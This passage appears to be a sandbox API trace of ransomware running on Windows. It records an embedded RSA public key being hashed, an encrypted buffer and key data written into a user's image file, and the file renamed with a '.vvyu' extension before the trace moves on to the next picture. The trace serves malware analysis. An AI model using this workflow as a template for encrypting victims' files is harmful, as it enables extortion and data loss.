(HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.960] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.961] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.961] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.961] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.961] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.961] GetLastError () returned 0x0 [0190.961] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.961] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.962] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.962] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.962] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18590) returned 0x2af5168 [0190.963] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3540 [0190.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f18 [0190.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3588 [0190.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f78 [0190.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f00 [0190.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fc0 [0190.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f48 [0190.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.964] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0190.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fc0 | out: hHeap=0x2c0000) returned 1 [0190.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fc0 [0190.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0190.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f48 [0190.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae5f00 [0190.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0190.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0190.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0190.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fc0 | out: hHeap=0x2c0000) returned 1 [0190.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.967] GetCurrentThreadId () returned 0x5d8 [0190.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5538 [0190.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.967] GetCurrentThreadId () returned 0x5d8 [0190.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fc0 [0190.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f00 [0190.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0190.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f48 [0190.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f60 [0190.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fd8 [0190.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0190.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fa8 [0190.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f90 [0190.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ff0 [0190.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f90 | out: hHeap=0x2c0000) returned 1 [0190.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f90 [0190.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fa8 | out: hHeap=0x2c0000) returned 1 [0190.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0190.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f00 [0190.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fc0 | out: hHeap=0x2c0000) returned 1 [0190.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ff0 | out: hHeap=0x2c0000) returned 1 [0190.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f90 | out: hHeap=0x2c0000) returned 1 [0190.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fd8 | out: hHeap=0x2c0000) returned 1 [0190.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0190.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f60 | out: hHeap=0x2c0000) returned 1 [0190.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f78 | out: hHeap=0x2c0000) returned 1 [0190.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3588 | out: hHeap=0x2c0000) returned 1 [0190.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.981] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x18581, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x18581, lpOverlapped=0x0) returned 1 [0190.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0190.982] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x18586, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.982] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.983] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.984] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.984] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.984] CloseHandle (hObject=0x584) returned 1 [0190.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0190.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.987] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\NCUi5d__zR45D.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ncui5d__zr45d.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\NCUi5d__zR45D.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ncui5d__zr45d.gif.vvyu")) returned 1 [0190.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.988] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.991] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2827230, ftCreationTime.dwHighDateTime=0x1d89a87, ftLastAccessTime.dwLowDateTime=0x83a36680, ftLastAccessTime.dwHighDateTime=0x1d89df2, ftLastWriteTime.dwLowDateTime=0x83a36680, ftLastWriteTime.dwHighDateTime=0x1d89df2, nFileSizeHigh=0x0, nFileSizeLow=0x1083c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NE4TCssID4OKfQf7Z.jpg", cAlternateFileName="NE4TCS~1.JPG")) returned 1 [0190.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3588 [0190.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0190.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3588 | out: hHeap=0x2c0000) returned 1 [0190.991] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\NE4TCssID4OKfQf7Z.jpg") returned=".jpg" [0190.991] CreateFileW 